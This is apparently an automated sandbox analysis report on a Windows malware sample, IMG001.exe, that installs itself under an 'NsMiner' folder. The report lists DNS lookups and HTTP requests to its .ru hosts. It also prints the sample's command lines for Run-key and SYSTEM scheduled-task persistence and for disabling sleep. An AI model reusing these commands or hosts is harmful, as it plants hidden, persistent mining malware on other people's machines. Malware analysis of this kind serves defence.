Apr 14, 2021 04:49:38.704687119 CEST	192.168.2.3	8.8.8.8	0x5706	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:38.849431992 CEST	192.168.2.3	8.8.8.8	0x541f	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:38.983221054 CEST	192.168.2.3	8.8.8.8	0xb437	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:39.761156082 CEST	192.168.2.3	8.8.8.8	0x91c1	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:39.843197107 CEST	192.168.2.3	8.8.8.8	0xc963	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:41.007811069 CEST	192.168.2.3	8.8.8.8	0x6b9c	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:41.084233999 CEST	192.168.2.3	8.8.8.8	0x6526	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:42.065689087 CEST	192.168.2.3	8.8.8.8	0x1c13	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:42.156963110 CEST	192.168.2.3	8.8.8.8	0xa3d7	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.115184069 CEST	192.168.2.3	8.8.8.8	0x22a	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.200656891 CEST	192.168.2.3	8.8.8.8	0x8eb6	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.845107079 CEST	192.168.2.3	8.8.8.8	0x6ad3	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.927969933 CEST	192.168.2.3	8.8.8.8	0x31ba	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:44.690237045 CEST	192.168.2.3	8.8.8.8	0x4690	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:44.766356945 CEST	192.168.2.3	8.8.8.8	0x131	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:45.395641088 CEST	192.168.2.3	8.8.8.8	0x544c	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:45.471251965 CEST	192.168.2.3	8.8.8.8	0x2c2c	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:46.044492006 CEST	192.168.2.3	8.8.8.8	0x86e3	Standard query (0)	hrtests.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:54.478739023 CEST	192.168.2.3	8.8.8.8	0xf287	Standard query (0)	profetest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:00.186825991 CEST	192.168.2.3	8.8.8.8	0x4c6f	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:00.256383896 CEST	192.168.2.3	8.8.8.8	0x48bc	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:00.321225882 CEST	192.168.2.3	8.8.8.8	0x50d3	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:08.608135939 CEST	192.168.2.3	8.8.8.8	0xb504	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:08.683676958 CEST	192.168.2.3	8.8.8.8	0xec68	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:08.801322937 CEST	192.168.2.3	8.8.8.8	0x3635	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:17.978888988 CEST	192.168.2.3	8.8.8.8	0x7cd5	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:18.096754074 CEST	192.168.2.3	8.8.8.8	0x2de9	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:18.163649082 CEST	192.168.2.3	8.8.8.8	0xd39e	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:26.284368038 CEST	192.168.2.3	8.8.8.8	0xa2f	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:26.368341923 CEST	192.168.2.3	8.8.8.8	0x579d	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:26.441515923 CEST	192.168.2.3	8.8.8.8	0x7c7	Standard query (0)	stafftest.ru	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Apr 14, 2021 04:49:38.820291042 CEST	8.8.8.8	192.168.2.3	0x5706	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:38.961533070 CEST	8.8.8.8	192.168.2.3	0x541f	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:39.043220043 CEST	8.8.8.8	192.168.2.3	0xb437	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:39.821099043 CEST	8.8.8.8	192.168.2.3	0x91c1	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:39.900194883 CEST	8.8.8.8	192.168.2.3	0xc963	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:41.065171003 CEST	8.8.8.8	192.168.2.3	0x6b9c	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:41.144356966 CEST	8.8.8.8	192.168.2.3	0x6526	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:42.128436089 CEST	8.8.8.8	192.168.2.3	0x1c13	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:42.215209007 CEST	8.8.8.8	192.168.2.3	0xa3d7	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.175153971 CEST	8.8.8.8	192.168.2.3	0x22a	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.257894039 CEST	8.8.8.8	192.168.2.3	0x8eb6	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.905314922 CEST	8.8.8.8	192.168.2.3	0x6ad3	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:43.985260010 CEST	8.8.8.8	192.168.2.3	0x31ba	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:44.747889042 CEST	8.8.8.8	192.168.2.3	0x4690	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:44.823332071 CEST	8.8.8.8	192.168.2.3	0x131	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:45.453265905 CEST	8.8.8.8	192.168.2.3	0x544c	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:45.528402090 CEST	8.8.8.8	192.168.2.3	0x2c2c	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:46.101933002 CEST	8.8.8.8	192.168.2.3	0x86e3	No error (0)	hrtests.ru	37.1.216.8	A (IP address)	IN (0x0001)
Apr 14, 2021 04:49:54.590064049 CEST	8.8.8.8	192.168.2.3	0xf287	No error (0)	profetest.ru	1.2.3.1	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:00.245940924 CEST	8.8.8.8	192.168.2.3	0x4c6f	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:00.313546896 CEST	8.8.8.8	192.168.2.3	0x48bc	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:00.369899988 CEST	8.8.8.8	192.168.2.3	0x50d3	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:08.665730953 CEST	8.8.8.8	192.168.2.3	0xb504	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:08.790730000 CEST	8.8.8.8	192.168.2.3	0xec68	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:08.849862099 CEST	8.8.8.8	192.168.2.3	0x3635	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:18.086589098 CEST	8.8.8.8	192.168.2.3	0x7cd5	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:18.154118061 CEST	8.8.8.8	192.168.2.3	0x2de9	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:18.221260071 CEST	8.8.8.8	192.168.2.3	0xd39e	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:26.341679096 CEST	8.8.8.8	192.168.2.3	0xa2f	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:26.426058054 CEST	8.8.8.8	192.168.2.3	0x579d	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)
Apr 14, 2021 04:51:26.498776913 CEST	8.8.8.8	192.168.2.3	0x7c7	No error (0)	stafftest.ru	255.255.0.0	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

hrtests.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49832	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:46.167551994 CEST	1331	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49833	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:46.453080893 CEST	1361	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49848	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:51.752847910 CEST	1390	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49849	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:51.865423918 CEST	1398	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49850	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:52.518357038 CEST	1399	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49851	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:52.628918886 CEST	1399	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49852	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:53.160115957 CEST	1400	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49853	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:53.270828962 CEST	1400	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49854	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:53.829547882 CEST	1401	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49855	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:53.954993963 CEST	1401	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49835	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:47.621979952 CEST	1362	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49836	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:47.736999035 CEST	1363	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49838	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:49.610702991 CEST	1372	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49839	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:49.723225117 CEST	1373	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49841	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:50.344017029 CEST	1373	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49842	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:50.460474014 CEST	1374	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49843	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:50.979654074 CEST	1374	OUT	GET /test.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49844	37.1.216.8	80	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe

Timestamp	kBytes transferred	Direction	Data
Apr 14, 2021 04:49:51.092395067 CEST	1375	OUT	GET /stat.html HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: hrtests.ru Connection: Keep-Alive Cache-Control: no-cache

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: IMG001.exe PID: 968 Parent PID: 5776

General

Start time:	04:49:59
Start date:	14/04/2021
Path:	C:\Users\user\Desktop\IMG001.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\IMG001.exe'
Imagebase:	0x400000
File size:	3551765 bytes
MD5 hash:	62E3FDCEC6EED38E01571716A25D4547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2412 Parent PID: 968

General

Start time:	04:49:59
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1124 Parent PID: 2412

General

Start time:	04:50:00
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskkill.exe PID: 2432 Parent PID: 2412

General

Start time:	04:50:00
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im tftp.exe
Imagebase:	0x200000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: tftp.exe PID: 5720 Parent PID: 968

General

Start time:	04:50:08
Start date:	14/04/2021
Path:	C:\Users\user\AppData\Local\Temp\tftp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\tftp.exe'
Imagebase:	0x400000
File size:	93184 bytes
MD5 hash:	C80D5BBD7F47398B9530A7968FF07FE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 43%, Metadefender, Browse Detection: 79%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: IMG001.exe PID: 5600 Parent PID: 968

General

Start time:	04:50:09
Start date:	14/04/2021
Path:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Imagebase:	0x400000
File size:	3551765 bytes
MD5 hash:	62E3FDCEC6EED38E01571716A25D4547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, Metadefender, Browse Detection: 88%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 68 Parent PID: 5600

General

Start time:	04:50:10
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c taskkill /f /im tftp.exe & tskill tftp.exe
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5424 Parent PID: 68

General

Start time:	04:50:10
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskkill.exe PID: 4800 Parent PID: 68

General

Start time:	04:50:11
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im tftp.exe
Imagebase:	0x200000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: tftp.exe PID: 576 Parent PID: 5600

General

Start time:	04:50:19
Start date:	14/04/2021
Path:	C:\Users\user\AppData\Local\Temp\tftp.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\tftp.exe'
Imagebase:	0x400000
File size:	93184 bytes
MD5 hash:	C80D5BBD7F47398B9530A7968FF07FE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6132 Parent PID: 5600

General

Start time:	04:50:21
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4244 Parent PID: 6132

General

Start time:	04:50:22
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 3484 Parent PID: 5600

General

Start time:	04:50:22
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5680 Parent PID: 3484

General

Start time:	04:50:22
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5388 Parent PID: 5600

General

Start time:	04:50:22
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: reg.exe PID: 6116 Parent PID: 6132

General

Start time:	04:50:22
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg add 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' /v '' /d 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe' /t REG_SZ
Imagebase:	0x1350000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 5992 Parent PID: 5388

General

Start time:	04:50:23
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 2100 Parent PID: 5600

General

Start time:	04:50:22
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\cmd.exe' /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 5384 Parent PID: 3484

General

Start time:	04:50:23
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn 'UAC' /SC ONLOGON /F /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Imagebase:	0x1180000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 4168 Parent PID: 2100

General

Start time:	04:50:23
Start date:	14/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: schtasks.exe PID: 5076 Parent PID: 5388

General

Start time:	04:50:23
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn 'UAC' /RU 'SYSTEM' /SC ONLOGON /F /V1 /RL HIGHEST /TR 'C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe'
Imagebase:	0x1180000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: powercfg.exe PID: 3528 Parent PID: 2100

General

Start time:	04:50:23
Start date:	14/04/2021
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	powercfg /CHANGE -standby-timeout-ac 0
Imagebase:	0x970000
File size:	80896 bytes
MD5 hash:	FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: IMG001.exe PID: 4456 Parent PID: 528

General

Start time:	04:50:24
Start date:	14/04/2021
Path:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
Imagebase:	0x400000
File size:	3551765 bytes
